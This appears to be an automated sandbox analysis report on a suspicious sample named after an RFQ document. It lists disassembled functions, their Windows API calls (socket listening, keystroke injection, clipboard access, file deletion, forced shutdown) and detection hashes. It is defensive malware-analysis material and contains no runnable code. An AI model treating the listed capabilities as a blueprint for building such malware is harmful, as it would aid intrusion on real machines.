                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 1946585618-1173974218
                                                                            • Opcode ID: d0a43fc62c175bd12b4779bd8906763666f97b62b6d29235c632a679cc9b86d0
                                                                            • Instruction ID: 50758d30624ffe4702438730d9735b00f84af7407dfd54fe8b92d05bc0335995
                                                                            • Opcode Fuzzy Hash: d0a43fc62c175bd12b4779bd8906763666f97b62b6d29235c632a679cc9b86d0
                                                                            • Instruction Fuzzy Hash: 9B616F3180228DABCF41FFE1CA569EDB77AAF15300F244169E40277292EB755F0ACB65
                                                                            Function 006FEC91 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: af37178ba6dfea0002142cca502d792ef561f371025e0226da168d2d62388922
                                                                            • Instruction ID: 2b311bc611c8b3a2abd44e4e1575e59a8bd9a8f2783bbcbaa253fcab142a04e2
                                                                            • Opcode Fuzzy Hash: af37178ba6dfea0002142cca502d792ef561f371025e0226da168d2d62388922
                                                                            • Instruction Fuzzy Hash: D341CE31204601AFE321DF58D888FA97BE2EF44318F14C498E5158BBB2C77AEC42CB94
                                                                            Function 006EE814 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
                                                                              • Part of subcall function 006E1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E167E
                                                                              • Part of subcall function 006E1607: GetLastError.KERNEL32 ref: 006E168E
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 006EE850
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-3163812486
                                                                            • Opcode ID: 4f622adadfa918196431c0a6dad30635b13ea72deec2e493549efe4dfe3178d3
                                                                            • Instruction ID: 887e74b7d381d72c6d3397738f3a9a39f99fe83a7629b04ae230196431e075dd
                                                                            • Opcode Fuzzy Hash: 4f622adadfa918196431c0a6dad30635b13ea72deec2e493549efe4dfe3178d3
                                                                            • Instruction Fuzzy Hash: 8C0126726523606BF72422FA9C8ABFB725DDB04341F148525FC02E21D1DA669C0081A8
                                                                            Function 0070112B Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 0070119D
                                                                            • WSAGetLastError.WSOCK32 ref: 007011AA
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 007011E1
                                                                            • WSAGetLastError.WSOCK32 ref: 007011EC
                                                                            • closesocket.WSOCK32(00000000), ref: 0070121B
                                                                            • listen.WSOCK32(00000000,00000005), ref: 0070122A
                                                                            • WSAGetLastError.WSOCK32 ref: 00701234
                                                                            • closesocket.WSOCK32(00000000), ref: 00701263
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                            • String ID:
                                                                            • API String ID: 540024437-0
                                                                            • Opcode ID: 876ae968cdd3f2d1247f201d8915e6ade6ea423231c95ec79b03d1857cc6c62f
                                                                            • Instruction ID: 75380e3e459b686337c2aa9641c4c0cdf396cd99102ccace752985d6da27007f
                                                                            • Opcode Fuzzy Hash: 876ae968cdd3f2d1247f201d8915e6ade6ea423231c95ec79b03d1857cc6c62f
                                                                            • Instruction Fuzzy Hash: 06416D31600104DFD715DF68C488B69BBE6BF46318F58C298E9569F2D2C775EC81CBA1
                                                                            Function 006ED2C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                              • Part of subcall function 006EE0B7: GetFileAttributesW.KERNEL32(?,006ECEB3), ref: 006EE0B8
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006ED33E
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 006ED38E
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006ED39F
                                                                            • FindClose.KERNEL32(00000000), ref: 006ED3B6
                                                                            • FindClose.KERNEL32(00000000), ref: 006ED3BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 99f53362bf0c8eb88ec145f1352b548846b5dc615ff4f75453a25114afaff505
                                                                            • Instruction ID: 4d9a6608f7f937f855222c4f83e990cfe44bbb31e6f1b84236262aedb5886825
                                                                            • Opcode Fuzzy Hash: 99f53362bf0c8eb88ec145f1352b548846b5dc615ff4f75453a25114afaff505
                                                                            • Instruction Fuzzy Hash: D631A2310093859BC341FFA4C8958EF77EABE92310F444A1EF4D1921D1EB60DA09C767
                                                                            Function 006BE4A0 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: __floor_pentium4
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 4168288129-2761157908
                                                                            • Opcode ID: e8a4d5bb67f22dc4ae1f068d88577b74c3d7b7303b10e15bcd53e94d1beaf7b5
                                                                            • Instruction ID: cca51231bad4ea8e179672cd30c593faf0f853abf1b7def505c75cd67901295f
                                                                            • Opcode Fuzzy Hash: e8a4d5bb67f22dc4ae1f068d88577b74c3d7b7303b10e15bcd53e94d1beaf7b5
                                                                            • Instruction Fuzzy Hash: 72C238B2E086288FDB65DF289D407EAB7B6EB44304F1441EAD84DE7251E775AEC18F40
                                                                            Function 006F63AC Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 006F63FA
                                                                            • CoInitialize.OLE32(00000000), ref: 006F6557
                                                                            • CoCreateInstance.OLE32(0071FD14,00000000,00000001,0071FB84,?), ref: 006F656E
                                                                            • CoUninitialize.OLE32 ref: 006F67F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            • Opcode ID: aebc3f410b69fa2ec77b569139d958ed5a1194e16954b7adadecde4ba915b2cd
                                                                            • Instruction ID: b601e5fbdf6b113e1d750fbaf934456bdf24ecdf06d638486ae06365c5267594
                                                                            • Opcode Fuzzy Hash: aebc3f410b69fa2ec77b569139d958ed5a1194e16954b7adadecde4ba915b2cd
                                                                            • Instruction Fuzzy Hash: FFD15771608205AFC354EF24C881DABB7EAFF89704F40892DF1958B2A1DB71ED45CB96
                                                                            Function 006F9A49 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 006F9A96
                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 006F9BA9
                                                                              • Part of subcall function 006F3792: GetInputState.USER32 ref: 006F37E9
                                                                              • Part of subcall function 006F3792: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006F3884
                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 006F9AC6
                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 006F9B93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                            • String ID: *.*
                                                                            • API String ID: 1972594611-438819550
                                                                            • Opcode ID: 522c5b19e6162dfb4f613dac559b3a3a2603e3493159f00bf4a9577bf3bc1a67
                                                                            • Instruction ID: e185128de9ab217985519e0a3fadb439f6ddcf0d678b47f2e178d1d634bb721a
                                                                            • Opcode Fuzzy Hash: 522c5b19e6162dfb4f613dac559b3a3a2603e3493159f00bf4a9577bf3bc1a67
                                                                            • Instruction Fuzzy Hash: 3641B17190420EAFCF55EFA4CC49BEE7BB5EF05310F20415AE905A2291EB319E45CF61
                                                                            Function 0069ADFD Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0069AECE
                                                                            • GetSysColor.USER32(0000000F), ref: 0069AFA3
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0069AFB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$LongProcWindow
                                                                            • String ID:
                                                                            • API String ID: 3131106179-0
                                                                            • Opcode ID: 11b1fe257e1ad105f42f366c4f4debed14ef68bc5c64e61a51f2287aafe41ae4
                                                                            • Instruction ID: 5fb5046f7f7e0d6993a5748f342e3fbca816167bd6afe16f0ff21bdd0f5659e8
                                                                            • Opcode Fuzzy Hash: 11b1fe257e1ad105f42f366c4f4debed14ef68bc5c64e61a51f2287aafe41ae4
                                                                            • Instruction Fuzzy Hash: 04A1D5B0505104BEEF299AAC8C5CEFB369FDB42341B15811AF502C7B91CA299D46E2B7
                                                                            Function 0070172D Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00702F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00702FA1
                                                                              • Part of subcall function 00702F75: _wcslen.LIBCMT ref: 00702FC2
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00701784
                                                                            • WSAGetLastError.WSOCK32 ref: 007017AB
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00701802
                                                                            • WSAGetLastError.WSOCK32 ref: 0070180D
                                                                            • closesocket.WSOCK32(00000000), ref: 0070183C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 1601658205-0
                                                                            • Opcode ID: 8e50a1cf55d7738907dc152eba89caff03d620a6bec5075773f98818983d79b6
                                                                            • Instruction ID: 617eb31a7f14595c2d916e99c038a748ef6f1fb48598308f0a35642b36286ac6
                                                                            • Opcode Fuzzy Hash: 8e50a1cf55d7738907dc152eba89caff03d620a6bec5075773f98818983d79b6
                                                                            • Instruction Fuzzy Hash: 2551BC71A00200AFDB10AF64C886F6A77E6AF45714F58819CF919AF3C2CA75AD41CBE5
                                                                            Function 00711B74 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 58978dc8ecc9b139e8480ea3ba19225722353dc918ea11e2cbcfa1a718ce3fa2
                                                                            • Instruction ID: 658bb67a686e9453419f945dd853302d3f63802d536e6eca57fe1b04cbe94a70
                                                                            • Opcode Fuzzy Hash: 58978dc8ecc9b139e8480ea3ba19225722353dc918ea11e2cbcfa1a718ce3fa2
                                                                            • Instruction Fuzzy Hash: 8B21D3717442108FD7219F2EC844B9A7BA5AF85350F59C06CE9459F2C2D779EC82CBE8
                                                                            Function 006899D0 Relevance: 7.4, Strings: 5, Instructions: 1152COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                            • API String ID: 0-1546025612
                                                                            • Opcode ID: a1df5dc6467b62e9675ca71ddf9a1d24eaf2d309b84ba0ddbb8563b4c500a2dd
                                                                            • Instruction ID: 78e157dae488d382eceb38f9e261d5f50cab1de5cc486154beb2ac5f6bcd5a00
                                                                            • Opcode Fuzzy Hash: a1df5dc6467b62e9675ca71ddf9a1d24eaf2d309b84ba0ddbb8563b4c500a2dd
                                                                            • Instruction Fuzzy Hash: FAA25B70A0421A8BDF24DF58C944BFDB7B3EF54314F1882AAE855A7380D7749D82CBA5
                                                                            Function 0070A5A3 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0070A5D3
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0070A5E1
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0070A6C3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070A6D2
                                                                              • Part of subcall function 0069D5DC: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,006C4062,?), ref: 0069D606
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                            • String ID:
                                                                            • API String ID: 1991900642-0
                                                                            • Opcode ID: 98aeac6130b579013b89a5c5a83034e5872437884316a357e6110fa8543eb55f
                                                                            • Instruction ID: 0a9fec7b88363bc2af92e73ab79e8a63c98ef1d0009298977c7d3795d1187605
                                                                            • Opcode Fuzzy Hash: 98aeac6130b579013b89a5c5a83034e5872437884316a357e6110fa8543eb55f
                                                                            • Instruction Fuzzy Hash: 64516BB1508300AFC750EF24C886A5BBBF9FF89754F408A2DF58597291EB74D904CB96
                                                                            Function 006EA975 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 006EA9CA
                                                                            • SetKeyboardState.USER32(00000080), ref: 006EA9E6
                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 006EAA54
                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 006EAAA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 3263adb5a7866667ddfd8eb5ac6f486dea09f12d3fa7b88180031cd04579774c
                                                                            • Instruction ID: f75c24d68c7acdf4937bb64928ea37bffbe97e1b9c38b96ac0dae65627c7a3b1
                                                                            • Opcode Fuzzy Hash: 3263adb5a7866667ddfd8eb5ac6f486dea09f12d3fa7b88180031cd04579774c
                                                                            • Instruction Fuzzy Hash: 39312A70A413D8AEFF31CAAECD057FE7BA7AF44310F04822AE481522D5D374A955C76A
                                                                            Function 006BBB0F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006BBB1F
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • GetTimeZoneInformation.KERNEL32 ref: 006BBB31
                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,0075121C,000000FF,?,0000003F,?,?), ref: 006BBBA9
                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,00751270,000000FF,?,0000003F,?,?,?,0075121C,000000FF,?,0000003F,?,?), ref: 006BBBD6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                            • String ID:
                                                                            • API String ID: 806657224-0
                                                                            • Opcode ID: b98a88d9f92619a8d8b6832377e31c366602b84c5fe78ee3e9bfaf94ee74f732
                                                                            • Instruction ID: 648a70b423b62fb9cfceb88b67f2c331faefb8ff07f4cdcb9b617f69b3f22622
                                                                            • Opcode Fuzzy Hash: b98a88d9f92619a8d8b6832377e31c366602b84c5fe78ee3e9bfaf94ee74f732
                                                                            • Instruction Fuzzy Hash: 803103B0A44245DFCB11DFA9CC809EDBBB5FF01311B1482AAE010D73A1D7B08D80CB94
                                                                            Function 006FCD62 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006FCDA7
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006FCE08
                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 006FCE1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                            • String ID:
